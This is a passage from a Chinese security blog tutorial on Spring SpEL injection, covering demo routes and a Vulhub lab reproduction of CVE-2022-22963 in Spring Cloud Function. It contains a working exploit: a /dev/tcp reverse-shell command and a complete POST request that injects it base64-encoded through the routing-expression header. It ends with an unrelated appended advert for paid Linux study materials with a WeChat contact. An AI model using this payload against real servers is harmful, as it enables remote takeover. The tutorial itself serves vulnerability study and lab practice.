上述控制器逻辑很简单,我添加了三个路由:
路由 | 配置 | 是否存在 SpEL 注入漏洞 |
---|---|---|
/spel1 | 不指定 EvaluationContext ,默认是 StandardEvaluationContext | 是 |
/spel2 | 指定上下文 StandardEvaluationContext | 是 |
/spel3 | 指定上下文 SimpleEvaluationContext | 否 |
4、接下来直接运行 SpringBoot 项目,即可在本地 8081 端口成功访问到 Web 服务:
5、接下来根据我们配置的路由来验证漏洞,Payload为:/spelX?input=T(Runtime).getRuntime().exec("calc")
:
从上面简单而直观的漏洞示例代码可以看出,在不指定 EvaluationContext
或者显示采用 StandardEvaluationContext
作为上下文的时候,如果 SpEL 表达式的值可被外部输入所控制,则存在因 SpEL 表达式注入导致 RCE 的风险。
CVE-2022-22963
接下来通过复现、调试分析一个 SpEL 表达式注入 CVE 漏洞来进一步学习、理解此类漏洞,此处挑选的是 CVE-2022-22963。
漏洞简述
如 Vulhub官方文档所述:Spring Cloud Function 提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像 Amazon AWS Lambda 这样的 FaaS(函数即服务,function as a service)平台。
2022年3月,Spring Cloud 官方修复了一个 Spring Cloud Function 中的 SPEL 表达式注入漏洞,由于 Spring Cloud Function中 RoutingFunction 类的 apply 方法将请求头中的 “spring.cloud.function.routing-expression
” 参数作为 SpEL 表达式进行处理,造成了 SpEL 表达式注入漏洞,攻击者可利用该漏洞远程执行任意代码。
【受影响版本】3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2
参考链接:
环境搭建
本文使用 Ubuntu 官方虚拟机 + Vulhub CVE 漏洞靶场环境 复现该漏洞。以前的漏洞复现文章已经写过 Vulhub 靶场的使用步骤:渗透测试-Openssl心脏出血漏洞复现。
整体复述一下,Ubuntu 上安装 Docker 环境和搭建 Vulhub 靶场的步骤:
1、安装docker:
apt-get install -y docker.io
2、安装docker-compose:
pip install docker-compose
3、启动docker后台服务:
sudo service docker start
4、将当前用户加入docker组
sudo usermod -aG docker $USER
5、配置 docker 加速器(提高容器下载速度):
https://blog.csdn.net/feiying0canglang/article/details/126491715
6、下载vulhub漏洞目录:
git clone https://github.com/vulhub/vulhub.git
7、进入想要复现的漏洞对应文件夹:
cd ~/vulhub/struts2/s2-048/(示例路径)
8、以root身份执行以下命令开始运行漏洞容器:
docker-compose up -d
回顾 Docker 用法请参考历史博文:渗透测试-Docker容器。
【推荐】提高 Docker 镜像下载速度请参考:Docker–提高下载速度的方法。
此处顺便再简单总结下 Docker 常用命令:
目的 | 命令 |
---|---|
在Docker公用仓库搜索镜像 | docker search bwapp(容器镜像名) |
从Docker公用仓库拉取镜像 | docker pull raesene/bwapp(远程镜像路径) |
返回本地Docker容器镜像信息 | docker images |
将镜像运行为一个真正在运行的容器 | docker run -d -p 8080:80 本地容器镜像名 |
查看正在运行的容器 | docker ps |
查看所有容器(无论是否正在运行) | docker ps -a |
查看指定容器的详细信息 | docker inspect 容器名或id |
进入容器的shell交互模式 | docker exec -i -t 容器id bash |
停止正在运行的容器 | docker stop 容器id |
重启本地已停止运行的容器 | docker start 容器id |
强制删除本地容器 | docker rm -f 容器ID |
Ubuntu 虚拟机成功搭建环境如下:
物理机访问 Docker 服务(http://192.168.171.129:8080/
):
反弹shell
先说下这个漏洞产生的原因:如果在 /functionRouter
的 POST 请求头中添加一个 spring.cloud.function.routing-expression
参数,Spring Cloud Function 会直接将参数值带入 SpEL 中查询导致 SpEL 注入。
那我们直接在 POST 请求中发送反弹 Shell 的命令即可,此处使用同一局域网中的 Kali 虚拟机作为攻击机(192.168.171.128):
bash -i >& /dev/tcp/192.168.171.128/6666 0>&1
但是需要使用 reverse-shell 在线工具 将上述反弹 shell 的命令进行 Base64 编码(具体原因请参见:Java反弹shell小记):
直接发送报文:
POST /functionRouter HTTP/1.1
Host: 192.168.171.129:8080
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xMjgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}")
Connection: close
Content-Length: 6
test
【题外话】此处顺便补充一个小技巧,BurpSuite 如果显示字体模糊、分辨率不佳的情况下(比如此图,伤眼睛啊……),可以在桌面快捷方式右键选择“属性”,在兼容性中选择如下配置项后重启即可解决(效果可参见下文另外的 Burp 截图):
此时 Kali 攻击机可获得反弹的 Shell(其中 1832.168.171.129 正是 Ubuntu 靶机的局域网 IP):
至此,我们已成功复现该漏洞,通过 SpEL 注入实现了 RCE 远程命令执行。
最后,结束 Ubuntu 虚拟机靶场容器环境的运行:
CVE漏洞调试分析
简单的复现漏洞并不是目的,我们的目的是从历史 CVE 漏洞中分析根因,并尽可能能够实现在白盒代码审计实战中做到举一反三。
本地搭建
此处采用本地 IDEA 新建 SpringBoot 项目的方式来搭建漏洞环境,直接沿用前文 “案例演示” 章节中的简易 SpringBoot 项目。
不想折腾的话可以直接在 Github 获取来源的漏洞环境项目:Spring-Cloud-Function-Spel。
1、只需要在 pom.xml 中新增引入 spring-boot-starter-web
、spring-cloud-function-web
(存在漏洞的 3.2.2 版本):
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.cloud</groupId>
<artifactId>spring-cloud-function-web</artifactId>
<version>3.2.2</version>
</dependency>
2、接着在 application.properties
配置文件中添加spring.cloud.function.definition=functionRouter
(此配置也可以不配,非必需)
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数Linux运维工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年Linux运维全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Linux运维知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip1024b (备注Linux运维获取)
,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上Linux运维知识点,真正体系化!**
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以添加VX:vip1024b (备注Linux运维获取)
[外链图片转存中…(img-EsR8EpYH-1712498184529)]